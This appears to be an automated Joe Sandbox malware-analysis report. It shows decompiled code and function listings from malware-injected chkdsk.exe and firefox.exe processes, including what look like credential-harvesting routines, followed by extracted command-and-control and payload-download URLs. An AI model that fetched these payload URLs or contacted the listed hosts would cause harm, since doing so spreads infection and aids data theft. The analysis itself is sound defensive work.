String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 7a0525b7f1db3f310dff5ecbd51905c02cc8eb24f8a511877aeb9132c7bdb0a9
Instruction ID: fbcd087fa72066dce706d032ea9832cc4449df7df969189c8b0217ea9f57740b
Opcode Fuzzy Hash: 7a0525b7f1db3f310dff5ecbd51905c02cc8eb24f8a511877aeb9132c7bdb0a9
Instruction Fuzzy Hash: 9051F831600219AADF10DB94FD89FFE77A9FF14310F0405A9ED06A7181EBB09A518E65

Uniqueness

Uniqueness Score: -1.00%

Function 04FE9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04FE9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x50bbe98);
				E05037C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E05028F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E04FF9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x50d65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E04FFA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E05005A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E050004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x50d65e0; // 0x75c8a680
							 *0x50d91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x50d65e8; // 0x75397740
									if(_t148 != 0) {
										 *0x50d91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E04FFDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E04FF3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E04FF9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E0504247B();
									goto L26;
								} else {
									_t152 = E04FFA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E050004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x04fe9046
0x04fe9046
0x04fe904b
0x04fe9050
0x04fe9055
0x04fe905b
0x04fe905d
0x04fe9066
0x04fe906f
0x04fe9078
0x04fe9080
0x04fe9088
0x04fe908f
0x04fe9095
0x04fe90a9
0x04fe90b1
0x04fe90be
0x04fe90c6
0x04fe90cf
0x04fe90e2
0x04fe90f7
0x04fe90fb
0x04fe9118
0x00000000
0x04fe9123
0x04fe913b
0x04fe913f
0x00000000
0x00000000
0x04fe9147
0x0504231f
0x0504231f
0x00000000
0x0504231f
0x04fe9154
0x05042330
0x05042336
0x05042336
0x04fe915a
0x04fe915a
0x04fe915a
0x04fe9161
0x04fe9167
0x04fe916b
0x04fe9172
0x04fe9182
0x04fe918e
0x04fe9199
0x04fe91ba
0x04fe91be
0x00000000
0x04fe91e0
0x05042358
0x05042360
0x05042368
0x0504236a
0x05042372
0x00000000
0x05042378
0x05042378
0x05042381
0x05042458
0x05042458
0x0504245b
0x05042463
0x05042468
0x0504246e
0x0504246e
0x050424a7
0x00000000
0x050424a7
0x0504238f
0x05042396
0x0504239c
0x0504239f
0x0504239f
0x050423bb
0x050423c8
0x050423ca
0x050423d2
0x0504244c
0x0504244c
0x05042453
0x00000000
0x050423d4
0x050423e7
0x050423e9
0x050423f1
0x00000000
0x00000000
0x050423f9
0x05042402
0x05042408
0x0504240c
0x05042413
0x05042423
0x0504243f
0x00000000
0x00000000
0x05042441
0x05042446
0x05042446
0x00000000
0x05042446
0x050423fb
0x00000000
0x050423fb
0x050423d2
0x00000000
0x05042372
0x04fe91be
0x04fe9118
0x04fe90fd
0x04fe9102
0x04fe910e

Strings

@w9u, xrefs: 0504245B
$, xrefs: 04FE90B1
@, xrefs: 04FE9095

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID:
String ID: $$@$@w9u
API String ID: 0-4239655683
Opcode ID: 01ee96b042a0e092baac0ae28c87fc81d44db41e2e40378bc373b4d625aa93b0
Instruction ID: b9aca8c77e7ef18af898a9c826c755b17af3d450d02cef62cb8a8b0aba015c1e
Opcode Fuzzy Hash: 01ee96b042a0e092baac0ae28c87fc81d44db41e2e40378bc373b4d625aa93b0
Instruction Fuzzy Hash: 40812DB5E012699BDB31DF54DC45BEEB6B8AF44710F0041EAEA09B7290D7705E85CF60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: firefox.exePID: 7624, Parent PID: 4556COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	962
Total number of Limit Nodes:	30

Executed Functions

Function 00000265BE72ACD4 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00000265BE72AEE3

Strings

User, xrefs: 00000265BE72ADAB
UR, xrefs: 00000265BE72AD5F
L: , xrefs: 00000265BE72AD66
name, xrefs: 00000265BE72ADB2
2, xrefs: 00000265BE72ADE1
Pass, xrefs: 00000265BE72AD97
word, xrefs: 00000265BE72AD9E

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: NamesPrivateProfileSection
String ID: UR$2$L: $Pass$User$name$word
API String ID: 709140578-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 4a9a89547042b230ece60de59f0f8a66f8f24b069339ecb9dd0ab5ec12a53f25
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E6A1F330618B988FEB29EF6894487EEB7E1FF54344F00462DE48AD7287DB718946C785

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE72ACE2 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00000265BE72AEE3

Strings

User, xrefs: 00000265BE72ADAB
UR, xrefs: 00000265BE72AD5F
L: , xrefs: 00000265BE72AD66
name, xrefs: 00000265BE72ADB2
2, xrefs: 00000265BE72ADE1
Pass, xrefs: 00000265BE72AD97
word, xrefs: 00000265BE72AD9E

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: NamesPrivateProfileSection
String ID: UR$2$L: $Pass$User$name$word
API String ID: 709140578-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 80ecca6f10bec383c366ae1f88a0790d44a4eedb6b08a2719515581d07d29c82
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: F0A1D270618B9C8FEB29EF6894447EEB7E1FB58304F00462DE44AD7286EB718946C785

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE730232 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 00000265BE730449
NtWriteFile.NTDLL ref: 00000265BE7307B9

Strings

`, xrefs: 00000265BE73041D

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: File$CreateWrite
String ID: `
API String ID: 2263783195-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: c4768c2557cb119a3fbdf9c09bd7a862ce9f7852e7e7f58d697bb96c7b955d88
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 96227E70A18E598FDB98DF28C4897AAF7E1FB58344F44022EE05ED3295DB719852CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE727B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE ref: 00000265BE727CCA

Strings

kern, xrefs: 00000265BE727B99
.dll, xrefs: 00000265BE727BCD
el32, xrefs: 00000265BE727BA0

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: d3cfd490ab15a9702e8908beab5c7fe160ddf9837b5fe3d9663106b468d764f1
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 6D51B170914A5C8FEB94EFA8C8C97EDB7E0FB58304F04017AD84EDB25ADA708945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE727B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE ref: 00000265BE727CCA

Strings

kern, xrefs: 00000265BE727B99
.dll, xrefs: 00000265BE727BCD
el32, xrefs: 00000265BE727BA0

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 8fe84b8bd458792e4aad99b0570306f5737af4254044b988951db9a3e449ef3a
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 59418070918A5C8FDB94EFA8C4C97EDB7E0FB68304F04416AD84EDB25ADE709945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE731BAC Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00000265BE731D46

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0f411646a440e9851a7b7aed96a9861ea226e54cd2f0ea73379ee2fdd80d9458
Instruction ID: 3d30dd3b9d6a75fe7440f94a4068ca440215fbef95ffeea46b8fdf4ef5a457d8
Opcode Fuzzy Hash: 0f411646a440e9851a7b7aed96a9861ea226e54cd2f0ea73379ee2fdd80d9458
Instruction Fuzzy Hash: FE412D30320EF44AFAE4AA28489D3ADD3D1AF5A389F9C1479944BC61CFDDA6CC4642D1

Uniqueness

Uniqueness Score: -1.00%

Function 00000265BE72E612 Relevance: 1.6, APIs: 1, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000265BE72E68B

Memory Dump Source

Source File: 00000025.00000002.2440004367.00000265BE6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000265BE6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_265be6c0000_firefox.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e82b22fa62be60122f056adc306974e40473edbde293424008e47d26a3a268ef
Instruction ID: 2bde7e06bcbe5321383420fa0ab4cd6b63276c9a4b4709aaace52338ef296581
Opcode Fuzzy Hash: e82b22fa62be60122f056adc306974e40473edbde293424008e47d26a3a268ef
Instruction Fuzzy Hash: 8301DD30218F884BE754E724C4CD7A7F3D0FFD8348F480529644EC6199EA76DA418781

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop esi		32_2_0071730D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop ebx		32_2_00707B1C

Source: Malware configuration extractor	URLs: www.shantelleketodietofficial.site/wn19/
Source: Malware configuration extractor	URLs: http://barsam.com.au/bin_FCWtLoO90.bin

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View	IP Address: 217.160.0.18 217.160.0.18
Source: Joe Sandbox View	IP Address: 209.99.40.222 209.99.40.222

Source: ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin4
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binC:
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binf
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bink
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binzs
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.ce
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000001C.00000000.1831225392.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754355480.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243385118.000000000F61E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
